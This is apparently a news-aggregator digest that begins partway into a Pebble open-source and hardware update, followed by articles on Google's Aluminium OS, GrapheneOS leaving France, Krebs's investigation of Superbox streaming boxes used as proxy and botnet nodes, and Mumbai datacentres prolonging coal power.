Last time round, barely any of the Pebble software was open source. This made it very hard for the Pebble community to make improvements to their watches after the company behind Pebble shut down. Things are different now! This whole relaunch came about primarily because Google open sourced PebbleOS (thank you!). Yesterday, the software that powers Pebble watches was around 95% open source. As of today, it’s now 100%. This means that if Core Devices were to disappear into a black hole, you have all the source code you need to build, run and improve the software behind your Pebble.

I confess that I misunderstood why 95% was much less sustainable than 100% until recently. I discuss this in more detail in my latest Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to sideload the old Pebble APK on my phone, but iPhone and other Android users have basically been stuck without an easily available Pebble mobile companion app for years.

Here’s how we’re making sure the 3 main Pebble software components are open source and guaranteed to work long into the future:

PebbleOS - software that runs on your watch itself. This has been 100% open source since January and we’ve committed to open sourcing all the improvements we’ve made → github.com/coredevices/PebbleOS . You can download the source code, compile PebbleOS and easily install it over Bluetooth on your new Pebble. Textbook definition of open source!

Pebble mobile companion app - the app for your iPhone or Android. Without the app, your Pebble is basically a paperweight. When Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app (get it here). Today, our app is 100% open source on Github - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross platform using Kotlin Multiplatform? Watch Steve’s presentation at Droidcon.

Developer tools and Pebble Appstore - this software enables people to build and share their watchapps and watchfaces.

In the case of dev tools, just being open source is not enough. They needed to be updated to work on modern computers. Before we made improvements, the state of the art of Pebble app development was using an Ubuntu virtualbox VM with Python2! Over the summer, our incredibly productive intern upgraded all the SDK and dev tools and created a new way to develop Pebble apps in the browser . You should check them out!

Then there’s the Pebble Appstore. This is a collection of nearly 15,000 watchfaces and watchapps that you - the Pebble community - developed between 2012 and July 2018. When Fitbit pulled the plug on the original Pebble Appstore, the Rebble Foundation downloaded a copy of all the apps and faces, and set up a new web service to let users of the old Pebble app continue to download and use watchfaces. This was an incredible effort, one that I have used thousands of times, and I am a happy paying subscriber. But it’s still centralized - if their server disappears, there is no freely available backup.

To compensate for that, today we’re launching two new things:

  • The Pebble mobile app will soon (later this week) be able to subscribe to multiple appstore ‘feeds’. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app.
  • We’ve created our own Pebble Appstore feed (appstore-api.repebble.com) and new Developer Dashboard. Our feed (fyi powered by 100% new software) is configured to back up an archive of all apps and faces to Archive.org (backup will gradually complete over the next week). Today, our feed only has a subset of all Pebble watchfaces and apps (thank you aveao for creating Pebble Archive!). Developers - you can upload your existing or new apps right now! We hope that this sets a standard for openness and we encourage all feeds to publish a freely and publicly available archive.

Important to note - developers will still be able to charge money for their apps and faces, using Kiezel pay or other services. This change does not preclude them from doing that, in fact it makes it even easier - I could see some developers creating a paid-only feed. As I recently wrote , we're also working on other ways for Pebble developers to earn money by publishing fun, beautiful and creative Pebble apps.

Another important note - some binary blobs and other non-free software components are used today in PebbleOS and the Pebble mobile app (ex: the heart rate sensor on PT2 , Memfault library, and others). Optional non-free web services, like Wispr-flow API speech recognizer, are also used. These non-free software components are not required - you can compile and run Pebble watch software without them. This will always be the case. More non-free software components may appear in our software in the future. The core Pebble watch software stack (everything you need to use your Pebble watch) will always be open source.

Pebble Time 2 more details - finally!

Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.

PT2 Schedule Update

We’re currently in the middle of Pebble Time 2 design verification test (DVT) phase. After we finish that, we go into production verification test (PVT) and then mass production (MP). So far, things are proceeding according to the schedule update I shared last month but that is extraordinarily subject to change. We still have a lot of testing (especially waterproof and environmental) to go. If we find problems (which is likely) we will push the schedule back to make improvements to the product.

The one major complicating factor is the timing of Chinese New Year (CNY). It’s early next year - factories will shut down for 3 weeks starting around the end of January. After restarting, things always take a week or two to get back to full speed.

We are trying our best to get into mass production and ship out at most several thousand Pebble Time 2s before CNY. It’s going to be very tight 🤞. More likely is that production will begin after CNY, then we need to transfer the watches to our fulfillment center, and ship them out. Realistically, at this time we’re forecasting that the majority of people will receive their PT2 in March and April. Please keep in mind that things may still change.

Picking a PT2 colour

There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white or dark gray, still TBD). Let me be very clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all emails have gone out.

On a related note, I am extremely happy that we built and shipped Pebble 2 Duo. Not only is it an awesome watch, it was also a phenomenal way for us to exercise our production muscles and ease back into the systematic flow of building and shipping smartwatches.

PT2 Demo!

A video is worth a million words - so I encourage you to watch me demo the Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION, which means their parts have imperfect qualities! Subject to change!

The video below opens to the part of the video where I do the demo.

Google's new 'Aluminium OS' project brings Android to PC

Hacker News
www.androidauthority.com
2025-11-24 18:49:47
Comments...
Original Article
Android Bot on laptop screen

The Android operating system is incredibly versatile. Beyond smartphones , it officially powers tablets, watches, TVs, cars, and XR headsets. However, it has virtually no presence on traditional PCs, where Google instead relies on ChromeOS . Despite Google’s efforts to challenge the dominance of Windows and macOS, ChromeOS remains a distant third. To close this gap, the company is unifying ChromeOS and Android into a single desktop platform, codenamed ‘Aluminium OS.’ Here’s what we know so far.

Android on PCs: The story so far

One year ago, Android Authority exclusively revealed Google’s plan to rally behind Android as its unified desktop OS . Our source indicated that this shift aims to create products that better compete with the iPad while making more effective use of development resources. In July, a Google executive confirmed part of our reporting, revealing that the company intends to merge ChromeOS and Android into a single platform. Finally, at Qualcomm’s Snapdragon Summit in September, Google officially announced it is bringing Android to the PC market . The company stated it is collaborating with Qualcomm to build a new platform that converges mobile and desktop computing, leveraging recent advancements in AI.

Qualcomm CEO Cristiano Amon (left) and Google SVP of Devices and Services Rick Osterloh (right) announcing a joint project to bring Android to PCs.

While we now know Google is building Android for PCs, there are still many unknown details. Is Google retiring the ChromeOS brand? Will existing Chromebooks receive the new operating system, or will they be left behind? Will this OS arrive only on budget machines, or target premium PCs as well? What will the interface actually look like, and what new features can we expect?

These are the burning questions as Google continues developing the platform. We likely won’t have all the answers until we get closer to launch, but thanks to job listings and bug reports, we’ve uncovered early details that offer some clues.

Aluminium OS: Google’s PC ambitions take shape

Over the weekend, a tipster on Telegram named Frost Core shared a link to an intriguing Google job listing for a ‘Senior Product Manager, Android, Laptop and Tablets.’ While we already know Google is bringing Android to the PC, the listing explicitly states that the role involves ‘working on a new Aluminium, Android-based, operating system.’ This effectively confirms that Aluminium is the codename for the new unified platform. The name appears to be a nod to the project’s roots: like Chromium (the open-source version of ChromeOS), Aluminium is a metal ending in ‘-ium.’ The choice of the British spelling — emphasizing the ‘Al’ prefix — likely pays homage to Android serving as the project’s foundation.

Much like Android XR , Google says its new Aluminium OS is ‘built with artificial intelligence (AI) at the core.’ This implies deep integration with Gemini , Google’s AI chatbot and large language model (LLM). At the Snapdragon Summit, Rick Osterloh, Google’s SVP of Devices and Services, outlined the company’s plans to bring its AI stack to PCs:

“This is another way we can leverage all of the great work we’re doing together on our AI stack, our full stack, bringing Gemini models, bringing the assistant, bringing all of our applications and developer community into the PC domain. And I think this is another way in which Android is gonna be able to serve everyone in every computing category.”

Snippet from job listing confirming Aluminium OS

We have yet to see exactly what new features Gemini will enable on Android PCs, but we hope the OS will fully leverage the hardware’s potential. On select premium smartphones, Gemini already powers an array of on-device AI features that demand significant memory and processing power from the CPU, GPU, and NPU. There were concerns that Google might restrict this new OS to the same budget-friendly niche where Chromebooks currently excel, ceding the high-end market to Microsoft and Apple. However, the job listing dispels those fears.

The new Senior Product Manager role is tasked with “driving the roadmap and curating a portfolio of ChromeOS and Aluminium Operating System (ALOS) Commercial devices across all form factors (e.g. laptops, detachables, tablets, and boxes) and tiers (e.g., Chromebook, Chromebook Plus, AL Entry, AL Mass Premium, and AL Premium) that meets the needs of users and the business.”

This confirms that Android won’t be limited to laptops; the roadmap explicitly includes detachables, tablets, and ‘boxes’ (likely mini-PCs akin to the Chromebox or Mac Mini). Furthermore, the tiered structure — listing ‘AL Mass Premium’ and ‘AL Premium’ alongside ‘AL Entry’ — indicates that Google intends to push Android beyond budget PC hardware. While exact pricing for these tiers is hard to predict, it is clear Google aims to compete across the entire spectrum — a strategy foreshadowed by the recent Chromebook Plus initiative.

Speaking of Chromebooks, the job listing also raises questions about the future of ChromeOS. The listing notes that the person will help “drive ChromeOS and Aluminium (e.g., Android) platforms and devices,” creating a roadmap and product portfolio that encompasses both. This implies the two platforms will coexist for some time. However, the person is also explicitly tasked with developing a strategy for transitioning “Google from ChromeOS to Aluminium with business continuity in the future.” This confirms that Google aims to eventually replace ChromeOS entirely — a move that must be managed carefully to avoid disrupting enterprise customers. This transition will likely require a multi-pronged approach:

  • Legacy Support: Existing ChromeOS devices that cannot be migrated to Aluminium OS will likely receive updates until they reach their end-of-life. This means Google will need to maintain the legacy ChromiumOS codebase for several more years.
  • Optional Migration: Rather than forcing an immediate switch, Google may offer an optional upgrade path for capable hardware. The company is currently testing Aluminium OS on development boards featuring MediaTek Kompanio 520 and 12th Gen Intel Alder Lake processors, so existing Chromebooks with these chips could be eligible for the update. However, migrating an operating system on live hardware is a massive technical hurdle that will require meticulous execution.
Mention of Aluminium OS devices in bug report

And of course, there will be new PCs launching with Aluminium OS out of the box as well.

Is ChromeOS dead as we know it?

Even if Google replaces the entire foundation of ChromeOS with Android, the company may be reluctant to abandon the name. While it lacks the market share of Windows or macOS, the ChromeOS brand is widely recognized, particularly in the education and enterprise sectors. Although the job listing doesn’t confirm the final naming scheme, bug reports spotted by Frost Core hint that Google may retain the branding. Engineers have referred to the current platform as “ChromeOS Classic” and “non-Aluminium ChromeOS,” implying the new Android-based version could simply usurp the name “ChromeOS.”

Alternatively, Google might adopt “Android Desktop” as the name to align with its renewed focus on promoting Android as a brand. However, “Android Desktop” could merely be an internal designation for the form factor. Since these references have only appeared in bug reports, the final marketing name remains an open question.

When will Android on PCs launch?

Google is actively developing the platform, with bug reports confirming that the company is testing fresh builds of Android 16 on development hardware. The company has confirmed the project will launch in 2026, though it remains unclear whether it will arrive in the first or second half of the year. Given this timeline, it is highly likely that the initial public release will be built upon Android 17 , which is due next year. We will continue to monitor the project to find further details ahead of its official debut.

GrapheneOS migrates server infrastructure from France

Hacker News
www.privacyguides.org
2025-11-24 18:48:04
Comments...
Original Article

The GrapheneOS project has announced on X that they are ceasing all operations in France, asserting that the country is no longer safe for "open source privacy projects".

While the operating system will still be available to French users, all website and discussion servers are being relocated abroad.

Until now, the project relied on OVH Beauharnois, a French hosting provider, for its core website and social media services. The migration plan moves the Mastodon, Discourse, and Matrix instances to a combination of local and shared servers in Toronto. Critical website infrastructure will be hosted by Netcup, a German‑based company.

GrapheneOS claims that it does not collect confidential user data on its servers or store critical infrastructure in France. Therefore, the migration does not affect services such as signature verification and downgrade protection for updates.

Citing the government's support of the European Union Chat Control proposal, GrapheneOS developers are also refusing travel to France. Developers are no longer allowed to work inside the country due to safety concerns.

This decision was sparked by negative press coverage from two articles published by Le Parisien . An interview with French cybercrime prosecutor Johanna Brousse implies potential legal action against the project:

"With this new tool, there is real legitimacy for a certain portion of users in the desire to protect their exchanges. The approach is therefore different. But that won't stop us from suing the publishers if links are discovered with a criminal organization and they don't cooperate with the law"

GrapheneOS argues that Le Parisien has conflated the project with government-sponsored forks, which are fake copies of its operating system. The news outlet refers to a fake Snapchat app, dark web advertising, and a series of unlisted YouTube videos that are not features of GrapheneOS itself.

The project had previously threatened litigation against these government-sponsored forks. One prominent example is ANOM, an FBI-backed shell company that developed a compromised Android operating system and messaging platform as part of Operation Trojan Shield between 2018 and 2021.

Is Your Android TV Streaming Box Part of a Botnet?

Krebs
krebsonsecurity.com
2025-11-24 18:44:52
On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix, ESPN and Hulu, all for a one-time fee of around $400. But security experts warn ...
Original Article

On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix , ESPN and Hulu , all for a one-time fee of around $400. But security experts warn these TV boxes require intrusive software that forces the user’s network to relay Internet traffic for others, traffic that is often tied to cybercrime activity such as advertising fraud and account takeovers.

Superbox media streaming boxes for sale on Walmart.com.

Superbox bills itself as an affordable way for households to stream all of the television and movie content they could possibly want, without the hassle of monthly subscription fees — for a one-time payment of nearly $400.

“Tired of confusing cable bills and hidden fees?,” Superbox’s website asks in a recent blog post titled, “Cheap Cable TV for Low Income: Watch TV, No Monthly Bills.”

“Real cheap cable TV for low income solutions does exist,” the blog continues. “This guide breaks down the best alternatives to stop overpaying, from free over-the-air options to one-time purchase devices that eliminate monthly bills.”

Superbox claims that watching a stream of movies, TV shows, and sporting events won’t violate U.S. copyright law.

“SuperBox is just like any other Android TV box on the market, we can not control what software customers will use,” the company’s website maintains. “And you won’t encounter a law issue unless uploading, downloading, or broadcasting content to a large group.”

A blog post from the Superbox website.

There is nothing illegal about the sale or use of the Superbox itself, which can be used strictly as a way to stream content at providers where users already have a paid subscription. But that is not why people are shelling out $400 for these machines. The only way to watch those 2,200+ channels for free with a Superbox is to install several apps made for the device that enable them to stream this content.

Superbox’s homepage includes a prominent message stating the company does “not sell access to or preinstall any apps that bypass paywalls or provide access to unauthorized content.” The company explains that they merely provide the hardware, while customers choose which apps to install.

“We only sell the hardware device,” the notice states. “Customers must use official apps and licensed services; unauthorized use may violate copyright law.”

Superbox is technically correct here, except for maybe the part about how customers must use official apps and licensed services: Before the Superbox can stream those thousands of channels, users must configure the device to update itself, and the first step involves ripping out Google’s official Play store and replacing it with something called the “App Store” or “Blue TV Store.”

Superbox does this because the device does not use the official Google-certified Android TV system, and its apps will not load otherwise. Only after the Google Play store has been supplanted by this unofficial App Store do the various movie and video streaming apps that are built specifically for the Superbox appear available for download (again, outside of Google’s app ecosystem).

Experts say while these Android streaming boxes generally do what they advertise — enabling buyers to stream video content that would normally require a paid subscription — the apps that enable the streaming also ensnare the user’s Internet connection in a distributed residential proxy network that uses the devices to relay traffic from others.

Ashley is a senior solutions engineer at Censys , a cyber intelligence company that indexes Internet-connected devices, services and hosts. Ashley requested that only her first name be used in this story.

In a recent video interview, Ashley showed off several Superbox models that the Censys research team was studying in the malware lab — including one purchased off the shelf at BestBuy.

“I’m sure a lot of people are thinking, ‘Hey, how bad could it be if it’s for sale at the big box stores?'” she said. “But the more I looked, things got weirder and weirder.”

Ashley said she found the Superbox devices immediately contacted a server at the Chinese instant messaging service Tencent QQ , as well as a residential proxy service called Grass IO .

GET GRASSED

Also known as getgrass[.]io, Grass says it is “a decentralized network that allows users to earn rewards by sharing their unused Internet bandwidth with AI labs and other companies.”

“Buyers seek unused internet bandwidth to access a more diverse range of IP addresses, which enables them to see certain websites from a retail perspective,” the Grass website explains. “By utilizing your unused internet bandwidth, they can conduct market research, or perform tasks like web scraping to train AI.”

Reached via Twitter/X, Grass founder Andrej Radonjic told KrebsOnSecurity he’d never heard of a Superbox, and that Grass has no affiliation with the device maker.

“It looks like these boxes are distributing an unethical proxy network which people are using to try to take advantage of Grass,” Radonjic said. “The point of grass is to be an opt-in network. You download the grass app to monetize your unused bandwidth. There are tons of sketchy SDKs out there that hijack people’s bandwidth to help webscraping companies.”

Radonjic said Grass has implemented “a robust system to identify network abusers,” and that if it discovers anyone trying to misuse or circumvent its terms of service, the company takes steps to stop it and prevent those users from earning points or rewards.

Superbox’s parent company, Super Media Technology Company Ltd. , lists its street address as a UPS store in Fountain Valley, Calif. The company did not respond to multiple inquiries.

According to this teardown by behindmlm.com , a blog that covers multi-level marketing (MLM) schemes, Grass’s compensation plan is built around “grass points,” which are earned through the use of the Grass app and through app usage by recruited affiliates. Affiliates can earn 5,000 grass points for clocking 100 hours usage of Grass’s app, but they must progress through ten affiliate tiers or ranks before they can redeem their grass points (presumably for some type of cryptocurrency). The 10th or “Titan” tier requires affiliates to accumulate a whopping 50 million grass points, or recruit at least 221 more affiliates .

Radonjic said Grass’s system has changed in recent months, and confirmed the company has a referral program where users can earn Grass Uptime Points by contributing their own bandwidth and/or by inviting other users to participate.

“Users are not required to participate in the referral program to earn Grass Uptime Points or to receive Grass Tokens,” Radonjic said. “Grass is in the process of phasing out the referral program and has introduced an updated Grass Points model.”

A review of the Terms and Conditions page for getgrass[.]io at the Wayback Machine shows Grass’s parent company has changed names at least five times in the course of its two-year existence. Searching the Wayback Machine on getgrass[.]io shows that in June 2023 Grass was owned by a company called Wynd Network. By March 2024, the owner was listed as Lower Tribeca Corp. in the Bahamas. By August 2024, Grass was controlled by Half Space Labs Limited, and in November 2024 the company was owned by Grass OpCo (BVI) Ltd. Currently, the Grass website says its parent is just Grass OpCo Ltd (no BVI in the name).

Radonjic acknowledged that Grass has undergone “a handful of corporate clean-ups over the last couple of years,” but described them as administrative changes that had no operational impact. “These reflect normal early-stage restructuring as the project moved from initial development…into the current structure under the Grass Foundation,” he said.

UNBOXING

Censys’s Ashley said the phone home to China’s Tencent QQ instant messaging service was the first red flag with the Superbox devices she examined. She also discovered the streaming boxes included powerful network analysis and remote access tools, such as Tcpdump and Netcat .

“This thing DNS hijacked my router, did ARP poisoning to the point where things fall off the network so they can assume that IP, and attempted to bypass controls,” she said. “I have root on all of them now, and they actually have a folder called ‘secondstage.’ These devices also have Netcat and Tcpdump on them, and yet they are supposed to be streaming devices.”

A quick online search shows various Superbox models and many similar Android streaming devices for sale at a wide range of top retail destinations, including Amazon , BestBuy , Newegg , and Walmart . Newegg.com, for example, currently lists more than three dozen Superbox models. In all cases, the products are sold by third-party merchants on these platforms, but in many instances the fulfillment comes from the e-commerce platform itself.

“Newegg is pretty bad now with these devices,” Ashley said. “Ebay is the funniest, because they have Superbox in Spanish — the SuperCaja — which is very popular.”

Superbox devices for sale via Newegg.com.

Ashley said Amazon recently cracked down on Android streaming devices branded as Superbox, but that those listings can still be found under the more generic title “ modem and router combo ” (which may be slightly closer to the truth about the device’s behavior).

Superbox doesn’t advertise its products in the conventional sense. Rather, it seems to rely on lesser-known influencers on places like Youtube and TikTok to promote the devices. Meanwhile, Ashley said, Superbox pays those influencers 50 percent of the value of each device they sell.

“It’s weird to me because influencer marketing usually caps compensation at 15 percent, and it means they don’t care about the money,” she said. “This is about building their network.”

A TikTok influencer casually mentions and promotes Superbox while chatting with her followers over a glass of wine.

BADBOX

As plentiful as the Superbox is on e-commerce sites, it is just one brand in an ocean of no-name Android-based TV boxes available to consumers. While these devices generally do provide buyers with “free” streaming content, they also tend to include factory-installed malware or require the installation of third-party apps that engage the user’s Internet address in advertising fraud.

In July 2025, Google filed a “John Doe” lawsuit (PDF) against 25 unidentified defendants dubbed the “ BadBox 2.0 Enterprise ,” which Google described as a botnet of over ten million Android streaming devices that engaged in advertising fraud. Google said the BADBOX 2.0 botnet, in addition to compromising multiple types of devices prior to purchase, can also infect devices by requiring the download of malicious apps from unofficial marketplaces.

Some of the unofficial Android devices flagged by Google as part of the Badbox 2.0 botnet are still widely for sale at major e-commerce vendors. Image: Google.

Several of the Android streaming devices flagged in Google’s lawsuit are still for sale on top U.S. retail sites. For example, searching for the “ X88Pro 10 ” and the “ T95 ” Android streaming boxes finds both continue to be peddled by Amazon sellers.

Google’s lawsuit came on the heels of a June 2025 advisory from the Federal Bureau of Investigation (FBI), which warned that cyber criminals were gaining unauthorized access to home networks by either configuring the products with malicious software prior to the user’s purchase, or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process.

“Once these compromised IoT devices are connected to home networks, the infected devices are susceptible to becoming part of the BADBOX 2.0 botnet and residential proxy services known to be used for malicious activity,” the FBI said.

The FBI said BADBOX 2.0 was discovered after the original BADBOX campaign was disrupted in 2024. The original BADBOX was identified in 2023, and primarily consisted of Android operating system devices that were compromised with backdoor malware prior to purchase.

Riley Kilmer is founder of Spur , a company that tracks residential proxy networks. Kilmer said Badbox 2.0 was used as a distribution platform for IPidea , a China-based entity that is now the world’s largest residential proxy network.

Kilmer and others say IPidea is merely a rebrand of 911S5 Proxy , a China-based proxy provider sanctioned last year by the U.S. Department of the Treasury for operating a botnet that helped criminals steal billions of dollars from financial institutions, credit card issuers, and federal lending programs (the U.S. Department of Justice also arrested the alleged owner of 911S5).

How are most IPidea customers using the proxy service? According to the proxy detection service Synthient , six of the top ten destinations for IPidea proxies involved traffic that has been linked to either ad fraud or credential stuffing (account takeover attempts).

Kilmer said companies like Grass are probably being truthful when they say that some of their customers are companies performing web scraping to train artificial intelligence efforts , because a great deal of content scraping which ultimately benefits AI companies is now leveraging these proxy networks to further obfuscate their aggressive data-slurping activity. By routing this unwelcome traffic through residential IP addresses, Kilmer said, content scraping firms can make it far trickier to filter out.

“Web crawling and scraping has always been a thing, but AI made it like a commodity, data that had to be collected,” Kilmer told KrebsOnSecurity. “Everybody wanted to monetize their own data pots, and how they monetize that is different across the board.”

SOME FRIENDLY ADVICE

Products like Superbox are drawing increased interest from consumers as more popular network television shows and sportscasts migrate to subscription streaming services, and as people begin to realize they’re spending as much or more on streaming services than they previously paid for cable or satellite TV.

These streaming devices from no-name technology vendors are another example of the maxim, “If something is free, you are the product,” meaning the company is making money by selling access to and/or information about its users and their data.

Superbox owners might counter, “Free? I paid $400 for that device!” But remember: Just because you paid a lot for something doesn’t mean you are done paying for it, or that somehow you are the only one who might be worse off from the transaction.

It may be that many Superbox customers don’t care if someone uses their Internet connection to tunnel traffic for ad fraud and account takeovers; for them, it beats paying for multiple streaming services each month. My guess, however, is that quite a few people who buy (or are gifted) these products have little understanding of the bargain they’re making when they plug them into an Internet router.

Superbox performs some serious linguistic gymnastics to claim its products don’t violate copyright laws, and that its customers alone are responsible for understanding and observing any local laws on the matter. However, buyer beware: If you’re a resident of the United States, you should know that using these devices for unauthorized streaming violates the Digital Millennium Copyright Act (DMCA), and can incur legal action, fines, and potential warnings and/or suspension of service by your Internet service provider.

According to the FBI, there are several signs to look for that may indicate a streaming device you own is malicious, including:

  • The presence of suspicious marketplaces where apps are downloaded.
  • Requiring Google Play Protect settings to be disabled.
  • Generic TV streaming devices advertised as unlocked or capable of accessing free content.
  • IoT devices advertised from unrecognizable brands.
  • Android devices that are not Play Protect certified.
  • Unexplained or suspicious Internet traffic.

This explainer from the Electronic Frontier Foundation delves a bit deeper into each of the potential symptoms listed above.

Launch HN: Karumi (YC F25) – Personalized, agentic product demos

Hacker News
www.karumi.ai
2025-11-24 18:37:27
Comments...
Original Article

What a Karumi Agent can do for you

Hyper-personalization at Scale

"Demos are just the start. Agentic experiences redefine every step of GTM. Scalable personalization is here!"

Alex Lindahl

GTM Engineer @ Clay

"Faster 'Aha!' moments at scale with personalized demos, without headcount increase."

Bernard Aceituno

CEO @ StackAI

"We capture more leads and strengthen our funnel by scaling up demos right when prospects need them."

Max Minsker

CEO @ Cranston

‘It’s hell for us here’: Mumbai families suffer as datacentres keep the city hooked on coal

Guardian
www.theguardian.com
2025-11-24 18:35:24
As Mumbai sees increased energy demand from new datacenters, particularly from Amazon, the filthiest neighbourhood in one of India’s largest cities must keep its major coal plants Each day, Kiran Kasbe drives a rickshaw taxi through his home neighbourhood of Mahul on Mumbai’s eastern seafront, down ...
Original Article

Each day, Kiran Kasbe drives a rickshaw taxi through his home neighbourhood of Mahul on Mumbai’s eastern seafront, down streets lined with stalls selling tomatoes, bottle gourds and aubergines–and, frequently, through thick smog.

Earlier this year, doctors found three tumours in his 54-year-old mother’s brain. It’s not clear exactly what caused her cancer. But people who live near coal plants are much more likely to develop the illness, studies show , and the residents of Mahul live a few hundred metres down the road from one.

Mahul’s air is famously dirty. Even behind closed car windows, there is a heavy stench of oil and smoke.

“We are not the only ones facing health challenges in the area,” said Kasbe, who is 36. “It’s all covered with filth.”

Two coal plants run by the Indian multinationals Tata Group and Adani were due to close last year in a government push to cut emissions. But late in 2023, those decisions were reversed after Tata argued that electricity demand was rising too fast for Mumbai to go without coal.

Neither company responded to requests for comment.

Buildings shrouded in smog in Mumbai, India, in January. Photograph: Bloomberg/Getty Images

Economic growth and the need for air conditioning in climate change-linked extreme heat have seen India’s electricity demand soar in recent years. But an investigation by SourceMaterial and the Guardian reveals the biggest single factor in the city’s failure to end its dependence on fossil fuels: energy-hungry datacentres.

Leaked records also reveal the scale of the presence of the world’s biggest datacentre operator, Amazon, in Mumbai.

In the city’s metropolitan area, Amazon’s website records three “availability zones”, which it defines as one or more datacentres. Leaked internal Amazon records from last year, seen by SourceMaterial, reveal the company used 16 in the city.

As India transforms its economy into a hub for artificial intelligence, the datacentre boom is creating a conflict between energy demand and climate pledges, said Bhaskar Chakravorti, who researches technology’s impact on society at Tufts University.

“I’m not surprised they’re falling behind their green transition commitments, especially with the demand growing exponentially,” he said of the Indian government.

Kylee Yonas, a spokeswoman for Amazon, said Mumbai’s “emission challenges” were not caused by Amazon.

“On the contrary – Amazon is one of the largest corporate investors in renewable energy in India, and we’ve supported 53 solar and wind projects in the country capable of generating over 4m megawatt hours of clean energy annually,” she said. “These investments, which include our 99 megawatt wind project in Maharashtra, are enough to power over 1.3m Indian homes annually once operational.”

Amazon is building hundreds of datacentres around the world as it vies with Microsoft, Google and others for leadership of the booming AI market.

Tata Consultancy Services Ltd office in Mumbai, India. Photograph: Bloomberg/Getty Images

The company is failing to take responsibility for its role in prolonging the use of the most polluting energy sources, said Eliza Pan, a spokeswoman for Amazon Employees for Climate Justice.

“Amazon is using the shiny thing of AI to distract from the fact that it’s building a dirty energy empire,” she said.

Yonas denied this, saying: “Not only are we the leading datacentre operator in efficiency, we’re the world’s largest corporate purchaser of renewable energy for five consecutive years with over 600 projects globally.”

Amazon’s claims on green energy are controversial: the company has been criticised for using “ creative accounting ” by buying renewable energy certificates alongside direct purchases of green energy, as described by a member of Amazon Employees for Climate Justice.

‘Everything is contaminated’

Mahul, where Kasbe drives his rickshaw, is a former fishing village now home to tens of thousands of people who moved there after slum clearances elsewhere in the city.

Kiran Kasbe’s mother. Photograph: Courtesy Sushmita

Kasbe and his mother arrived there in 2018 after their home in the suburb of Vidyavihar was bulldozed. She had been healthy before the move but deteriorated rapidly until eventually she was diagnosed with brain cancer, he said.

Gajanan Tandle, who lives nearby, said pollution-linked illnesses were common. “There are so many cases of skin and eye irritation, cancer, asthma, TB and more, and no assistance from the government,” he said.

Another local, Santosh Jadhav, has lobbied the government to move people away from Mahul.

“Everything is contaminated. We are tired of fighting for a decent means of living,” he said. “It’s hell for us here.”


Amazon, an online marketplace that processes 13 million customer purchases each day, according to research by CapitalOne, has bet billions of dollars on expanding its lucrative cloud computing business and its AI-assisted services, from automated coding to translation.

The reason so many of its Mumbai centres have slipped under the radar is that they are leased rather than owned by the company. Whereas in the US Amazon tends to own its facilities outright, elsewhere it often rents either entire data farms or server racks in centres shared with other companies.

Shared “colocation” units account for a larger increase in datacentre energy use worldwide than owned or wholly leased facilities, according to Shaolei Ren, a computing specialist at the University of California, Riverside.

“Most of the energy in the datacentre industry is going into colocations,” he said. “They are everywhere.”

Workers near Amazon Prime branding in Mumbai, India, in September. Photograph: NurPhoto/Getty Images

Amazon’s Mumbai colocation datacentres used 624,518 megawatt hours of electricity in 2023, enough to power over 400,000 Indian households for a year, the leaked data shows.

India is poised to overtake Japan and Australia to become the second-largest user of datacentre electricity in the Asia-Pacific region, S&P has forecast. By 2030, datacentres will consume a third of Mumbai’s energy, according to Ankit Saraiya, chief executive of Techno & Electric Engineering, an Indian power infrastructure supplier.

‘Toxic hell’

As it scrambles to keep ahead of demand for power, the state government of Maharashtra has extended the life of Tata’s coal plant in Mahul by at least five years. At the same time, it also postponed the shutdown of a 500-megawatt station operated by Tata’s rival, Adani Group, north of the city.

When Tata argued for the extension in a petition to the state energy board, the biggest single factor the company cited was increased energy demand from datacentres. Adani said most anticipated new demand in the five years after the date by which its station was due to close would be from datacentres.

The power stations are just two of many polluters in Mumbai’s Mahul district. The area is also home to three refineries and 16 chemical factories, according to a 2019 report published by India’s Centre for Policy Studies which called the neighbourhood a “toxic hell”.

But the Tata station, opened in 1984 and, like other older power stations, subject to laxer emissions rules, is “one of the key sources of air pollution in Mumbai”, according to Raj Lal, chief air quality scientist at the World Emission Network.

It contributes nearly a third of local PM2.5 pollution, according to the Centre for Research on Energy and Clean Air. PM2.5 refers to airborne particles 2.5 micrometers or less in diameter that can cause significant health problems when inhaled.

Smoke rises from a chimney at the Tata Power Co Trombay Thermal power plant in Mumbai, India, in August 2017. Photograph: Bloomberg/Getty Images

Toxic heavy metals in coal ash from the plant are likely to cause “respiratory diseases, kidney issues, skin problems, cardiac issues”, said Shripad Dharmadhikary, founder of the environmental organisation Manthan Adhyayan Kendra.

Even with the Tata plant kept running, Mumbai’s power grid is creaking under the strain of surging demand. To guard against blackouts, Amazon’s colocation datacentres in the city have bought 41 diesel generators as backup and are asking for approval to install more, documents show.

In August a report by the Center for Study of Science, Technology and Policy (CSTEP) identified diesel generators as a major source of air pollution in the region.

The presence of datacentres that require constant power and diesel generators for backup “will naturally exacerbate emissions”, said Swagata Dey, air quality specialist at CSTEP, who argued that datacentre operators should be required by law to power them with pollution-free solar electricity.

One Amazon site in particular, just across the Thane Creek from Mahul, hosts 14 generators. One of the company’s partners received permission earlier this year to install 12 further generators at the site.

“Public health impacts must be a central consideration when siting datacenters and choosing energy sources,” said Ren of the University of California, Riverside, who co-wrote a recent paper assessing public health risk from diesel generators at US datacentres.

Sushmita does not use a surname because in India a surname indicates caste, a hierarchical and discriminatory social structure.

The Bitter Lesson of LLM Extensions

Hacker News
www.sawyerhood.com
2025-11-24 18:32:27
Comments...
Original Article

